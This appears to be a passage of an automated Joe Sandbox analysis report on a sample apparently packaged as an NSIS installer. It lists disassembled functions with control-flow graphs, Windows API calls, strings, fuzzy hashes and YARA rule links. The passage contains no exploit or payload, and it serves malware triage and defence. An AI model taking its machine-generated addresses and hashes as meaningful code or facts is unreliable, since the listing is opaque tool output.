40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                          • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                          • CreatePopupMenu.USER32 ref: 00405376
                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                          • EmptyClipboard.USER32 ref: 00405411
                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                          • CloseClipboard.USER32 ref: 0040546E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                          • String ID: @rD$New install of "%s" to "%s"${
                                                                                                          • API String ID: 2110491804-2409696222
                                                                                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                          Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                          APIs
                                                                                                          • #17.COMCTL32 ref: 004038A2
                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                          • API String ID: 2435955865-239407132
                                                                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                          Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                          Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 310444273-0
                                                                                                          • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                          • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                          • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                          • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                          Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                          • String ID:
                                                                                                          • API String ID: 2295610775-0
                                                                                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                                          Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                                                          • ShowWindow.USER32(?), ref: 004054D2
                                                                                                          • DestroyWindow.USER32 ref: 004054E6
                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                                                          • EnableWindow.USER32(?,?), ref: 00405757
                                                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                          • String ID: @rD
                                                                                                          • API String ID: 3282139019-3814967855
                                                                                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                                                          Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 